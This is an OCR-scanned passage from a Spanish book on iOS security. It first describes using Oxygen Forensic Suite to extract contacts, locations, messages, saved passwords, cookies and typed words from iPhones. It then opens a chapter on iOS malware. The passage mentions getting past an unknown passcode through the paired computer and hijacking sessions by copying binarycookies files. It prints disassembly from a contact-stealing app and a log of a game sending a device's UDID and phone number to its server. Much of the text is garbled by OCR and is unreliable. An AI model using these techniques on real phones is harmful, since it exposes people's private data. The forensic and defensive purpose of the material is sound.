se va a presentar una de estas herramientas, que además cuenta con soporte en idioma castellano, 


Análisis de datos de un dispositivo iOS con Oxygen Forensic Suite 


Oxygen Forensic Suite es una herramienta comercial para el análisis forense en telefonía móvil. 
Aunque es compatible con la mayoría de los teléfonos del mercado, esta solución se especializa cn 
la extracción y análisis de datos en smartphones, apoyándose cn un interfaz intuitivo que muestra 
toda la información del dispositivo en cómodas pestañas, junto a la opción de generar informes 
completos en diversos formatos. 


El hecho de simplificar numerosos procedimientos técnicos en tan solo unos clics hace que esta sea 
una atractiva opción a tener en cuenta para los usuarios que necesitan un uso intensivo a la hora de 
analizar numerosos dispositivos. 


La siguiente captura muestra la información que Oxygen Forensic por defecto es capaz de extraer 
de un teléfono. 
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Información básica del teléfono móvil y Mensajes multimedia con archivos 
datos dela tarjeta SIM. adjuntos. 
Lalista de contactos Gncluidos los 
números de fax, móviles, líneas fijas, Mensajes de E-mail con archives 
direcciones postales, fotos de contactos y | adjuntos. 
otra infomación de contacto). y 
sz GPRS, EDGE, CSD, HSCSD y tráfico 
Llamadas Perdidas Recibidas. WiFi comoregstro deinicio de 
dd ¿| sesiones. 


a Datos de la tarjeta SIM. ES Fotografías eimágenes de la galería. 
E Información de Llamadas entrantes. Ss Videos. 
a > 


Organizador (reuniones, citas del 
calendario, notas, recordatonos de 
há: paa ones: prada ps 


tareas a realizar). 
Todoslos archivos de la memoria del 
teléfono, así como de la tarjeta de 
S Notas de Texto. ad cdas 
iii aplicaciones instaladas y sus datos. 
Mensajes SMS (mensajes, registro, E 
3 Base de datos de Radio FM Estaciones 
mensajes borrados con algunas 
bal SR cas | (como parte de Explorador de archivos). 
siii A 
n Actividad de Lifablog: todoslos eventos 
ed PE 
| 5 ls geográficas. 


Protección de datos de Integridad con 
MDS, SHA-1. SHA-2, CRC, HAVAL, 
GOST D34.11-94. 


En 2002, Oxygen Software inventó la aplicación avanzada “Agente” que permite a la Suite de Oxygen 
extraer mucha más información de los teléfonos inteligentes que otras herramientas lógicas. En el 
caso de ¡OS cabe destacar que Oxygen Forensic Suite permite extraer y analizar datos almacenados 


en los archivos de copia de seguridad hechas por ¿Tunes o iCloud. 
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El proceso de captura de datos de un iPhone 

Oxygen Forensic Suite se alimenta de varios factores a la hora de conectar y extraer la información 
de un terminal móvil, dependiendo del sistema operativo del teléfono móvil sobre el cual se quiera 
realizar el análisis forense se utilizara uno u otro método. En la siguiente tabla se muestran los 
métodos que utiliza la herramienta para la extracción de estos datos. 


y Sistema Operativo Modo de Extracción Requisitos 

Android Utiliza Agente Oxy-Apent Memoria Externa >1MB 
| Blackberry (RIM) Utiliza Blackberry Desktop 
iPhone iOS (Apple) | Utiliza ITunes 
Nokia Symbian Utiliza Agente Oxy-4gent Memoria Externa >IMB | 


Tabla 06.01: Métodos de extracción de datos por sistema operativo. 


Para la correcta utilización de Oxigen Forensic se recomienda la utilización de cables USB y drivers 
originales proporcionados por el fabricante 


Es fundamental para cualquier herramienta forense conservar la estructura de ficheros intacta para 
no alterar posibles pruebas en una investigación, por lo tanto Oxygen Forensic permite antes de 
iendo a la vez un méto 


ndo así cualquier manipulación involuni a vez terminada la extracción el agente se 
desinstalará automáticamente y la información extraída se presentará en modo “Read-Only” para 
realizar la investigación. 


En la siguiente captura se muestra el inicio de la creación de un nuevo caso en el Oxygen Forensic, 
donde antes de comenzar con la extracción se solicita rellenar esta ficha eligiendo el tipo de //ash 
que interesa utilizar. 
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A continuación se detallan los pasos a seguir para ejecutar un análisis forense en un ¿Phone, en este 
caso de la gama ¡Phone 4. 


iPhone & iPad 


Antes de comenzar la extracción hay que asegurarse de que se cumplen los si 


¡guientes requisitos: 


- Se dispone del cable original USB suministrado con el dispositivo, 
- Se ticne instalada la versión de Oxygen Forensic Suite en el equipo. 


En el caso de una extracción de un teléfono iOS, Oxvgen Forensic se apoyará en las librerias de 
iTunes para obtener los datos del ¿Phone. para lo que es necesario haber parcado antes el terminal, 
Esto quiere decir, que se necesita contar con un terminal sin passcode o conocer el passcode del 
mismo para poder desbloquearlo. 


Si no se dan las circunstancias, tal vez lo más fácil sea conseguir el sistema operativo en el que fue 
parcado el terminal ¿Phone e instalar allí Oxygen Forensic Suite, con lo que ya no habrá que conocer 
previamente el passcode. 


Una vez que esté el teléfono conectado, Oxygen Forensic mediante un asistente comenzará a pedir 
al usuario que seleccione las secciones que desee analizar, pasando a continuación a extraer lodos 
los datos del sistema automáticamente. 


Para otros sistemas operativos Oxygen Forensic uliliza un agente llamado Oxy-Agent que se instala 
en una memoria externa del dispositivo dejando intacta la estructura de ficheros, de esta manera la 
herramienta es capaz de extraer numerosos datos de sistemas como Android, Windows Mobile o 
Nokia (Symbian). 


Como se puede observar en la siguiente captura, Oxygen Forensic Suite comienza con la extracción 
de forma Lotalmente automática y cl tiempo destinado para terminar este proceso dependerá del 
tamaño de la memoria del Smartphone que se esté analizando. 
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'na vez terminado e] proceso, es posible desconectar el teléfono y empezar a utilizar la herramienta 
cvgen Forensic Suite tanto a modo de consulta. como para la generación de informes forenses. 


continuación se detallan las secciones más importantes que permite la consulta de datos que se 
estran en pantalla, 


. Información en los dispositivos 


te es el punto de partida, se puede decir que es el indice desde donde se tiene una primera 
visualización de la información más vital y básica como el número de serie del teléfono (IMEI), 
versión del sistema operativo, si cl Smartphone está en modo Jailbreak, y una breve lista que 
uestra un resumen de las actividades del teléfono, como pueden ser el número de contactos, los 
sajes recibidos/enviados, etcétera. 


a línea temporal de un dispositivo 


Jno de los puntos más críticos a la hora de realizar un análisis forense es recrear un evento según 
'ha, hora, y detallar un esquema de diversos sucesos que ocurren en los intervalos especificados 
de la investigación. 


numerosas ocasiones se pide al analista determinar si este usuario ha realizado una llamada 
lefónica a un número de teléfono determinado o si se ha conectado a una página web específica, 
por poner dos ejemplos de los múltiples que se pueden dar. 
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Oxygen Forensic Suite tiene la herramienta más potente de todo el paquete de software en el Time- 
Tine. Esta característica de la herramienta saca todos los eventos temporales de todas las aplicaciones, 
que van desde que se enciende el móvil, hasta cualquier otro suceso como si se recibe una llamada, 
se envía un correo electrónico, se publica un 7Wwir, se conecta a una red Wi-Fi, se produce una 
Mamada perdida por Skype, o se hace una fotografía. 


Todo lo que se haga con el terminal queda registrado en las aplicaciones del sistema y por tanto en 
bases de datos, ficheros de configuración o servicios online, y Oxygen Forensic Suite los analiza 
todos y los muestra en una única línea temporal con un conjunto de filtros que permiten que el 
análisis se haga a golpe de clic. 


07.07.2010 11.8250 
08.07.2010 72240 


11052010 103551 
11.052010 10:39:56 


9 O Siope chat messagu 27.0420102508:10 Whats up? 
$ O Siope chat manga 26.04:2010 141023 Heto Jason! 
Y O Sipe chat message 20.04.2010 0.1838 _ Are yuu thara? 


+ O Skype chat message 27 04.2010 231503 
+ 1 O Siope crat message 27.04.2010 23:15 17 
$ O Skype chai mwosage 27042010251527 
+ O Skype ennt message 77.04. 2010231650 
30 Skype chat mensage 27 042M0 23 17:08 
$0 Skype chat message 27.04.2010 23 17.20 


O Siype chat message 27.04.2010 23 1:39 
O Skype chat, 
¡O Skype crwt message 27.04.2010 23:1927 
O Skorve chat meca 27.042010 232001 
È Skype crat message 27.04 2010232055 


Da yout remember anonn our isst meetngr 
Sorry onde a bt slupi 

Aout our NEW manang n a vee 

On yes, sure 

ve prepared ne documents, you were asiong or 
Carias included 


No, fist J E 
ut dom torget anoa me money rante 
lis sways great pleasure lo deal wth you ) 
Bye 

Hetal Are you there, guys? 


(O Skye chal message 2804201001934 Heto, Jasan 


Imagen 06.05: Ejemplo de parte de un Time-Line de un dispositivo. 


Esto ahorra un tiempo importantísimo al investigador forense. Hay que aclarar que a veces las fechas 
que se pueden ver muchas veces pueden resultar impactantes si se muestran en el filtro de fechas un 
año como 1980, esto se debe a que el programa registra eventos como pueden ser cumpleaños donde 
el usuario haya configurado el año del nacimiento de uno de sus contactos. 
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Aunque el Time-Line es la herramienta más poderosa, desde ella se pueden acceder a todo cl resto 
de secciones que hacen que un análisis de un ¡Phone o un ¿Pad que ocupa 1GB de datos sea mucho 
más sencillo. A continuación se muestran las más importantes. 


Análisis de contactos 


Quizás este apartado sea uno de los que, desde el punto de vista de una investigación, pueda tenerse 
en cuenta dada su utilidad al proporcionar información sobre la relación que exista entre los contactos 
que tenga el dueño del teléfono. En un terminal 105, como ya se ha mencionado anteriormente, estos 
datos son ficheros de lipo SQLite que pueden ser analizados manualmente con eualquier visor de 
SQLite. 


Dado el avance tecnológico ya no solo se guarda un nombre y un teléfono, sino que muchas veces 
se añaden notas personales del contacto, fechas significativas como cumpleaños, páginas web, sus 
redes sociales, incluso sus fotos, sin olvidar la extracción de información si el usuario tiene un 
contacto agregado en la marcación rápida/favorita. Todos estos detalles son muy interesantes y no se 
debe de olvidar que gran parte de las investigaciones comienzan con este apartado. 


Imagen 06.06: Información extraida de un Contacto en conercto. 


La gran potencia de Oxygen Forensic es que es capaz de reconocer la agenda de contactos en todas 
las aplicaciones e indicar todas las interacciones que ha habido con ellos, mostrando por cada 
contacto si ha habido una llamada realizada. perdida. si se ha enviado un SMS, un Whatsapp, una 
petición de videoconferencia por Skype o todos los correos electrónicos intercambiados. 


Esta información sc puede filtrar además por cada tipo de comunicación y se pueden reconocer 
diferentes cuentas sociales como una misma persona, lo que permite obtener una mejor visualización 
de los datos. 
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Imagen 06.07: Información de un contacto en las diversas aplicaciones de un dispositivo. 


Además, el análisis de estos datos permite saber el grado de cercanía que un determinado usuario 
manliene con sus contactos. y Oxygen Forensic mucstra este grado mediante un gráfico circular de 
relaciones. donde los más cercanos al núcleo (el dueño del terminal) son los que más relación tienen 
con él. 


Este gráfico se llama “Estadísticas de Comunicación” y permite saber muchas cosas del ducño por 
las comunicaciones que mantiene con toda su agenda de contactos. 


Imagen 06.08: Gráfico “Estadísticas de Comunicación” que permite ver la relación de un contacto. 
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Geolocalización de datos extraídos 


Un Smartphone es un dispositivo netamente móvil que va guardando información de los lugares por 
los que ha pasado, En una investigación judicial es probable que el juez, si asi lo considera, acabe 
pidiendo información a las operadoras para conocer a qué estaciones de telefonía se conectó, lo que 
permitiría hacer un estudio de la posición fisica del terminal mediante triangulación de señales, iy 


Esto puede no ser necesario si se analiza toda la información GPS que almacena un terminal iOS. 
La primera de ella es la base de datos de las torres de comunicaciones que se almacena en la base 
de dato: lo que viene a ser la misma información a la que se tendría acceso con 
una orden judi que decir que esto no es del todo cierto, ya que debido a un gran escándalo 
mediático, Apple ha reducido sustancialmente el volumen de información que se graha en este 
fichero, 


Otra información interesante de geoposicionamiento son las aplicaciones sociales como Foursquare, 
que guardan las coordenadas GPS cuando cl usuario hizo un “check-in”, que así se llama cl proceso 
en la app. 


a 8-80 FEET cda 
Imagen 06.09: Oxygen Forensic Sutie analiza en detallo FourSquare. 


Se puede encontrar también información GPS en los metadatos de fotografías tomadas por el 
terminal o-publicadas en sitios como Twiter o Flickr. Estos datos son analizados por aplicaciones 
como Crap png por supuesto Oxygen Forensic Suite analiza estos datos. 


Por último, en el caso de ¡OS, también se tienen en cuenta las redes Mi-Fi a la: que un terminal se ha 


onectado a lo largo de su 


Con todos estos datos extraídos y analizados, Oxygen Forensic Suite crea un Time-Line de posiciones 
GPS que son mostrados en un mapa, permitiendo que se sepa con un alto grado de certidumbre los 
sitios por los que ha pasado el terminal. 
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Imagen 06.10: Ubicaciones GPS reconocidas de un terminal iOS. 


Mensajes de comunicación 

Aunque la mensajeria instantánea como Skype, y Whatsapp están triunfando entre los usuarios de 
smartphones no se dehe olvidar que el número de canales de comunicación de un dispositivo iOS 
es infinitamente mayor, y que puede ir desde los SMS/MMS hasta las aplicaciones de chat como 
Messenger pasando por supuesto por los correos electrónicos. 


Un análisis de un terminal ¿OS en busca de las comunicaciones implicaría analizar todas las bases 
de datos, y todos los ficheros de comunicación de todas las aplicaciones con cslas características 
encontradas en un terminal. Oxygen Forensic Suite hace el análisis de todas esas aplicaciones 
de forma automática, y muestra por cada usuario qué mensaje ha sido enviado o recibido y qué 


aplicaciones ha utilizado para ello, tal y como se puede ver en la siguiento captura, 


Imagen 06.1 1:Caracteristicas de cada mensaje enviado y recibido. 
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En el caso de aplicaciones de mensajería concreta, en la que puede que existan contactos que no 
estén en la agenda, Oxygen Forensic hace un análisis detallado de las mismas, teniendo en la lista 
de apps completamente analizadas un número ingente de ellas, como Whatsapp, Facebook for iOS, 
Twitter, Google Talk, Yahoo Messenger, Skype, Gmail, etcótera. fe 


papa 13 
28/12/2011 7346:50 
25/12/2041 7:46:30 
28/12/2011 7:43:46 


28/12/2011 AD 
28712/2011 7142:38 
24/12/2011 7:42:38 


ren 06.12: Análisis de Whtsapp. 


Hay que indicar que, aunque Oxygen Forensic Suite busca datos borrados en las aplicaciones, en 
el caso de servicios especializados como RecoverMessages.com es posible obtener más datos de 
aplicaciones como Whatsapp, ya gu se hace una interpretación más exhaustiva de las páginas 
borradas de los ficheros SQLite. ri 


Registro de eventos 


En el registro de eventos se puede obtener el último historial de llamadas realizadas, respondidas, 
perdidas o enviadas, esta información también incluye el “Timestamp” mencionado anteriormente. 
El propósito de esta información puede ser vital para determinar un último uso del terminal y las 
llamadas recientes que se han enviado/recibido en él. La siguiente captura muestra esta sección: 


1AJ12/2011 16:19:50 

09/11/2011 18:03:14 

mae 
pelao 
MES 


+ 
* 
+ 
+ 
+ 
t 
+ 
+ 
t 


Imagen 06.13: Registro de eventos de llamadas. 
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El calendario 


Fl calendario es un excelente apartado donde es posible conocer los eventos importantes que el 
usuario ha marcado en su terminal, tal vez reuniones marcadas en determinados sitios, repeticiones 
de tareas con una alarma, o cualquier información que suele ser de elevada importancia y que el 
usuario del teléfono haya determinado. Todos estos datos. por supuesto, también aparecen incluidos 
dentro del Time-/.ine generado del terminal. 


Web browser & cache analyzer (Navegador web / analizador caché) 


Estudiar el historial del navegador y sus cookies proporciona una información extremadamente útil. 
En este caso particular y siendo un dispositivo ¡OS es capaz de extraer información del navegador 
Sufari. Dependiendo del servicio de configuración del dispositivo, Oxygen /"orensic Suite cs capaz 
de extracr incluso contraseñas que se han marcado en el navegador para recordar diversos servicios 
y sitios web, que la herramienta irá calalogando en la sección de passwords del proyecto de análisis. 


Además es posible consultar el historial de navegación, las páginas marcadas como favoritas, 
acceder a las cookies guardadas en el navegador para poder extraer datos incluso de sesiones activas, 
e información caplurada en numerosos formularios que hayan sido cachcados por el navegador. 


Google Services 


Los servicios de Google son interesantes, sobre todo por la transparencia y cl hecho de que incluyen 
un conjunto de servicios con la misma credencial, por ello Oxygen Forensic Suite es capaz de extraer 
información detallada de Google Mail, Google Calendar, Google Talk, Google Maps y Google+. 
Permite extracr varios usuarios en el mismo terminal (ya que muchas veces los usuarios dividen 
estas cuentas según uso profesional y doméstico) de todas y cada una de las apps de Google que 
están cn el terminal. 


| E Datos de usuario (133) | ¡Harenrvos de Aplicación (18) a 
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Tinagen 06.14: Información de Gmail extraida de un dispositiva móvil con análisis forense. 
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Cabe destacar que Oxygen Forensic Suite muestra la lista de ficheros que la herramienta ha extraído 
sobre la información de Googie Mail, como puede ser Gmail.db entre otros. Esto permite localizar 
fácilmente los ficheros que posteriormente se pueden contrastar con otras herramientas de tipo 
data carving que complementa el arsenal como analista forense (un ejemplo podría ser el caso de 
RecoverMessages para Whatsapp). 


El uso de mensajeria IM y en este caso Google Talk permite extraer conversaciones y contactos 
que cl usuario haya mantenido en su dispositivo. La importancia del servicio Google Maps en 
una investigación es alta, ya que, para completar la información de geoposicionamienteo, hay que 
tener en cuenta estos datos. Muchas personas utilizan este servicio buscando una calle o un sitio 
determinado. Poder extraer esta información y las coordenadas exactas. pueden mostrar un resultado 
muy importante ante un análisis forense. 


Imagen 06.15: Localización de un punto en Google Maps 


“ahoo! Services 


que no tan popular como Google. el funcionamiento de captura y extracción de información 
lativa a servicios de Yahoo! es prácticamente idéntica. Oxygen Forensic Suite es capaz de obtener 
formación de múltiples usuarios, tanto de Yahoo! Messenger como de Yahoo! Mail y analizar toda 
información que de estas aplicaciones hay en el sistema. 


plicaciones de redes sociales 


actividad en las redes sociales cada vez es más importante ante un análisis forense, en este caso se 
lizaran algunas de las más importantes. como pueden ser Facebook, Twitter, y FowrSquare. Hay 
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que decir que Oxygen Forensic Suite añade un mayor número de aplicaciones de este tipo dentro de 
su análisis de las que analiza gran cantidad de características en cada una de ellas. 


Para cada una de las aplicaciones sociales que reconoce Oxygen Forensic Suite (y son decenas de 
ellas). la herramienta mostrará las publicaciones, los amigos, los mensajes publicados en privado y 
se podrá obtener de cada una de ellas la lista de usuarios y/o contraseñas (si las hubiera) configurados 
en cada una de dichas aplicaciones. 


po 
aros Pa pp 07.12011 SA 
ca o o ALA 
mikon DOE Dare 07.11201 1R 
mekano ammore 07.113011 11:1608 


Imagen 06.16: Datos extraidos del dispositivo referentes a Twitter, 


Dropbox 


El popular servicio de sincronización de ficheros en la nube Dropbox también es capaz de ser 
extraido por Oxygen Forensic Suite, la posibilidad de ver información a modo de previsualización 
de los ficheros transferidos a este popular servicio puede ser de gran utilidad. 


Diccionarios 


En los terminales ¿OS los datos del corrector y el predictor de palabras se almacenan en el dispositivo. 
Estos datos permiten ver las palabras tecleadas que alguna vez han sido tecleadas en el dispositivo, 
casi a modo de keylogger, y con Oxygen /'orensic Suite es posible extraer este diccionario. 


Esas palabras permiten descubrir lugares, contraseñas tecleadas, o mensajes que se hayan podido 
enviar por medio de algún sistema, incluso de seguridad. Para poder sacar mejor provecho de este 
diccionario, la herramienta además cuenta con un simulador de frases que, utilizando la cronología 
intenta dar sentido al diccionario. Hay que recordar que esas posibles frases son solo eso. posibles 
frases que no tienen porqué haber sido cscrilas en ese orden, pero que tal vez puedan ayudar a 
responder a alguna cuestión concreta. Como se muestra en la imagen de la captura se incluye un 
simulador de frases, según el orden cronológico simula una posible frase. 
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DOSIS 


Imagen 06.17: Vista del diccionario de Oxigen Forensic. 


Aplicaciones 

¡Cada día van saliendo nuevas aplicaciones, y el eq! de Oxygen Forensic Suite va analizando todas 
y cada una de las más populares. No obstante, puede que alguna aplicación no haya sido analizada, 
o que se tenga interés en analizar en detalle algunas de ellas para sacar más información. Para ello, 
en el panel de aplicaciones va a ser posible acceder a todos los ficheros que están dentro del bundle 
de la aplicación en el sistema, y se clasificarán en formatos. Asi, será posible ver el archivo SOLite, 
Plist o XML que utiliza una determinada App para intentar sacar más información manualmente, 


Para revisar estos ficheros se acompañan visores para SQLite, para ticheros Plist y Bplist, editores 
de texto para ver ficheros TXT o de datos, e incluso editores hexadecimales que hacen el análisis 
más cómodo. 


Vie, 31 Aug 2011 07:02:33 +0000 


» 

Wed, 31 Aug 2011 0702:33 40000) 3 
Med, JA 2012 07:10:98 40000 1 

... Med, 2i Aug 2011 07:19:12 +0000 
a io 
Wed, 3: ug 2011 07:21:91 40000 


Imagen 06.18: Datos de Dropbox y revisión de ficheros «db con SQLite Viewer: 
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Si una aplicación en concreto fuera de interós cn cl análisis, bastaría con situarse en la zona 
correspondiente y seleccionar los archivos que se quieran escrutar. 


Aplicaciones de malware y spyware 


Como es posible ver en el capítulo dedicado al malware dentro de este libro, existen muchas 
alternativas para troyanizar un terminal iPhone, y muchas de ellas son en equipos con Jailbreak. 


Oxygen Forensic Suite analiza las apps que se encuentran en un terminal, ya sea con Jailbreak como 
sin Jailbreak. Especial es el caso de una investigación forense, y un terminal con Jailbreak. En dicho 
caso hay que dedicar especial atención a este tipo de software malicioso que puede estar instalado 
en el disposilivo. 


Tmagen 06.19: Algunas apps de spyware reconocidas por Oxygen Forensic Su 


En la última versión hay una gran cantidad de ellas en la sección spyware, pero siempre hay que 
revisar bien todas las apps, no sea que en alguna de ellas estuviera alguna de las nuevas herramientas 
que se crean día a día para instalar malware en el dispositivo, o algún malware dirigido en el mismo, 


Explorador de archivos 


Si se sigue bajando el nivel de acceso, se puede tratar ar todo el terminal como un único sistema de 
ficheros, sin pensar qué archivos pertenecen a qué apps o a qué parte del sistema. Esto es útil cuando 
se buscan determinados documentos o determinado tipo de archivo del que se quiera extraer un dato 
especial. 


Oxygen Forensic Suite proporciona una interfaz cómoda para ello, destacando para los usuarios 
más avanzados, la existencia de las pestañas que listan automáticamente archivos de tipo imágenes, 
audio, videos, archivos de bases de datos. y demás carpetas. Esto es extremadamente útil cuando no 
se conoce la estructura de ficheros del sistema operativo y se busca algo cn concreto, La siguiente 
captura muestra un ejemplo de navegación intuitiva de ficheros. 
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|<!DOCTYEE plist PUBLIC *-//Apple//DTD PLIST 1.0| 
<plist version="1,0"> 


<key>commente</key> 
<string»0</string> 
<rryodiarance</key> 
<string0</string> 


Desde esta interfaz es muy cómodo buscar datos concretos. Por ejemplo, uno de los tipos de ficheros 
que no aparecen son los hinarycookies. Sería posible elegir un punto de la estructura de carpetas y 
realizar una búsqueda para descubrir que apps tienen sesiones abiertas, y por lo tanto saber cuáles 
podrian ser secuestradas desde otro dispositivo simplemente copiando estos ficheros. 


Logs de actividad del dispositivo ¡OS 


Como último paso en el descenso de nivel, es posible obtener aún más datos si cube, con la 
información de lo que el usuario ha hecho en el teléfono revisando los logs del dispositivo. En este 
apartado es posible incluso determinar qué tecla ha sido pulsada y en qué momento fue hecho. 


Por supuesto, no es fácil el interpretar todos estos datos, y puede que el volumen de información que 
aparezca a lo largo de un gran periodo de tiempo o se haya perdido, o sea de una magnitud ingente, 
pero es posible tener estos datos, tal y como se muestra a continuación en la siguiente captura de 
pantalla. 
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Imagen 06.21: Vista del fichero jog del dispositivo. 


Generación de informes 


Por supuesto, como herramienta profesional que es, Oxygen Forensic Suite permite generar multitud 
de informes a alto nivel, y por ello, en todas las partes de la herramienta se pueden ir marcando datos 
como evidencias para que aparezcan en los diferentes tipos de informes que puedes ser exportados 
o impresos. 


$ El botón de exportación permite imprimir este informe en un cómodo fichero PDF, XML, HTML, 
RTF, XLS o CSV, y bastará con realizarlo desde la sección que interese imprimir en cada uno de los 


casos. a 


3. Conclusión y soporte 


Oxygen l'orensic Suite es una de las mejores herramientas comerciales con mayor proyección en el 
mercado de las soluciones de Análisis Forense Móvil basadas en extracción vía un análisis lógico. 


Sumando una interfaz amigable, informes completos, y un ahorro de tiempo junto a la imposibilidad 
de cometer un fallo a la hora de ejecutar una investigación hace que esta herramienta sea indispensable 
para cualquier analista u organización que necesita realizar múltiples extracciones o investigaciones. 
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Recientemente la aplicación ha sido traducida al castellano. la única herramienta que tiene soporte? 
interfaz en la lengua de Cervantes. El soporte y venta del producto se puede realizar a través del 
canal de España y Latino América visitando la web del partner oficial 


Las constantes innovaciones, actualizaciones que incorpora el equipo humano de Oxygen Forensic 
Suire le hace ser una de las mejores opciones para realizar análisis forense de manera fácil y rápida 
en este apasionante mundo. 


Para la versión en Castellano y obtener soporte o información se debe contactar con el partner de 
Oxygen l'orensic Suite EnigmaSec.com. Ellos son los responsables de la traducción y para las ventas 
en el territorio español y en determinadas zonas de América Latina. 


A su vez también cs posible visitar la página oficial del producto en http://www. Oxygen -forensic.com 
donde se podrá obtener la demo del producto durante 30 días y sin apenas limitaciones, a excepción 
del número de ejecuciones y la prohibición de utilizar la herramienta para fines comerciales. 


Cabe destacar la existencia de diferentes tipos de licencia, incluyendo una versión apoyada en un 


licenciamiento por USB pudiendo así tener la herramienta instalada en diversas maquinas incluyendo 
el soporte en VMWare. 
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Capítulo VU 
Malware en iOS 


. Introducción 


T modelo de negocio de Apple se sustenta no solo en las funcionalidades y opciones de sus productos, 
sean hardware o software, sino en una imagen de prestigio, reputación, calidad, etcétera, que 
s usuarios perciben respecto a los dispositivos iOS. Si además, se suma esto a que la App Store 
¿túa como una especie de “antivirus”, el resultado es que muchos usuarios viven creyendo, que el 
sistema operativo de su terminal, o de su tablet, es infalible y que no corre riesgos de ser infectado 
por malware. 


En OS, al igual que en otros sistemas operativos, existen vectores de amenazas, como virus, gusanos, 
ataques de phishing, troyanos, exploits, y en general, malware. Lo que ocurre en este caso, es que la 
imagen que los de Cupertino ofrecen sobre su sistema operativo móvil, hace pensar que no existe el 
malware en iOS, pero la realidad es muy distinta. 


A continuación se comentará un poco más en el detalle de, cómo Apple criba las aplicaciones que 
se suben a la App Store, y es que, aunque ya se sabe que no existe seguridad al 100% o completa, 
esta constituye un obstáculo más, para dificultar el camino de los atacantes/hackers al llevar a cabo 
ciones maliciosas. 


esta línea de poner obstáculos a los atacantes para dificultar la explotación, Apple ha ido 
corporando diferentes medidas de seguridad para mitigar las posibles amenazas. Se está hablando 
medidas como reducción de la capa de ataque edida ya conocida 
aplicativos web), reducir o simplificar el sistema operativo, esto es también conocido como 
(como por ejemplo reducir las opciones de la shell, o eliminar muchos de sus 
jecutables), separación de privilegios (típico en sistemas UNIX), y otras técnicas ya conocidas en 
vegadores web, como ASLR o Sandhoxing. 


ro la medida que se va a tratar ahora es la que se conoce como “Code-Signing”, y que no es más 
gue un filtro o revisión que realiza Apple de las apps de terceros que se intentan subir a la App Store. 
na vez que las apps han pasado dicha revisión, es decir, que han sido aceptadas por Apple, una 
tidad certificadora de confianza o CA, que en este caso es la propia Apple, firma (con su clave 
ivada) binarios y librerías, antes de que el kernel permita su ejecución. Además, solo las páginas 
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de memoria que provengan de fuentes firmadas podrán ser ejecutadas. Todo esto conlleva a varias 
conclusiones: 


- Nose puede descargar, instalar o ejecutar software malicioso. 

- Las apps no pueden cambiar su comportamiento dinámicamente o autoactualizarse por 
sí mimas. 

- Solo se pueden descargar apps de la App Store, y este es uno de los principales motivos 


por los que los usuarios realizan el Jailbreak a sus dispositivos, ya que de esta manera, 
pueden saltarse el Code-Signing, e instalar y ejecutar aplicaciones no firmadas. 


- Apple actúa de antivirus, y es muy dificil infectarse de malware, y por tanto existen pocas 
muestras de malware conocidas. 

- Otro impacto del Code-Signing es que complica la explotación. Un exploit que ejecute 
código en memoria, podría intentar descargar o ejecutar código u otras aplicaciones maliciosas, 
pero esto será denegado, ya que no están firmados. Por este motivo, los exploits estarán 
limitados a los procesos explotados originalmente (a menos que ataquen otras características 
del dispositivo). 


La App Store cuenta, según los datos de la última WWDC 2012 keynote de Apple, con más de 
650.000 apps y se han realizado más 30.000 millones de descargas. Pero a pesar de las clevadísimas 
cifras que maneja Apple, en cuanto al número de apps, descargas servidas, número de cuentas de 
clientes (400 millones), y en contra de lo que se pueda pensar, el número de muestras de malware 
conocidas en ¡OS es muy reducido, Y esto es en gran parte debido a que la propia App Store actúa a 
modo de antivirus. 


El malware existe en iOS, y casos de fuga de datos están o han estado a la orden del día. Ya quedó 
demostrado con la prueba de Charlie Miller, que aunque la App Store actúa a modo de antivirus, y 
existen pocas muestras de malware conocidas, el filtro de los ingenieros de Apple no es infalible, 
y por tanto hay que estar alerta en cuanto a cómo las apps utilizan los datos confidenciales de los 
usuarios, y como a veces pueden vulnerar la privacidad del propietario del dispositivo. 


2. Troyanos en la AppStore - 


Conseguir introducir un troyano en un terminal a través de la App Store es harto complicado, debido 
a las revisiones de funcionalidades y controles que se realizan, sin embargo, no es imposible. A lo 
largo del tiempo se han visto casos en los que se introduce un malware en la App Store que acaba en 
un terminal, o apps aparentemente normales que tenían funciones que atentaban contra la privacidad 
de los usuarios. A continuación se van a presentar varios casos reales de malware o fugas de datos, 
a través de aplicaciones que han estado en la App Store. 
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Find And Call 

Un caso ampliamente conocido, es el de la aplicación Find And Cal! que robaba agendas de contactos 
sin conocimiento o consentimiento alguno por parte del usuario, tal y como se aprecia en el código 
fuente de la app: 


| kABrersonlastNamePromerty ptr - Ox15EBC) 
IRT] 


EEE 


=i kASPersonMiddleNaneProperty ptr - Ox15E90) 


LDA Rl, [RI] 

ADO R3, PC 

STA RL. [SP SOXD4+war_60] 

LDA Ri, IRS) 

LORA RS, =| kABPersonBirihdayProperty ptr - Dx155M4) 
LDR R, [R] 

ADO R3, PE 


4 
- 
E 


(SP. 2OXS4war_5€] 


LOR m l 
LOR. RS. =i_kAgPersonOrganizetionPraperty_ ptr - 0x15E80) 
LDA RL, [RI] 

ADO Ra, PC 

STR RI, (SP, #0x94ivar_ 54] 

LOR AL (as, 

LORA Ra. —l kAlrersanzobTitlePraperty ptr - Dx13E8C) 
LoR AL, (RI) 

ADO. Ra, PC 

STA RL, [SP 20xS4+war_ac] 

LOR AL (as) 

LDR w AS. -l_kag2ersanPhoneProperty_ptr - Bx13EC8) 
LIR ma, (a 

ADO aa, Pe 

sia AL, [SP 0x94+rvar_44] 

LOR RL (al 

Lon AS. =1_kAðPersanEnailProperty_ptr - Bx1sED4) 
PE m, a 

a0 as. Pe 

SIR RL, [SP,J0x94+rvar_SC] 

LOR a. [Raj 

LORA RS. =(_kADPersanuaLPranerty_ptr - OX1SECO) 

DA AL Lali 

ADO. Ra, PE 

STA RL; [5P,SOxS4+var 38) 

LOA a, iaai 

LOR. W AS, <I_kABPersoninstantMe 


torm8 y sus juegos 
ʻo caso, conocido como el primer gran escándalo de robo de datos, fueron los juegos de la 
mpañía Storm8, como Vampires Live, Zombies Live, Rockstar Live, Kingdoms Live, Racing Live, 
lobsters, World War, etcétera, que robaban tanto las agendas de contactos de los usuarios, así como 
os datos confidenciales como UDID, correo electrónico. nombre del registro en el juego, número 
teléfono, etcétera. A continuación se muestra una captura del log del juego Vampires Live: 
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*1251184711.309 844 10.0.10.22 TCP_MISS/200 1425 GET http://vl.storm8.com 
/points.phpiversion=1.52Eudid=0e4esebadf3b0db8947f82d49aec361552041cE 
pf-62DEA9AZASA624185909768783EC3EAFEFpts=108pnum=0414%20610%205008model<iPhonek. 
sn=iPhonex20058sv=3.0 - DIRECT/67.228.117.55 text/html 


1251184712.092 783 10.0. 10.22 TCP_MISS/200 1660 GET htto://static.storm8.com/vl/js 
Iglobal.jsiv=147 - DIRECT/198.142.23.102 application/x-Javascript 


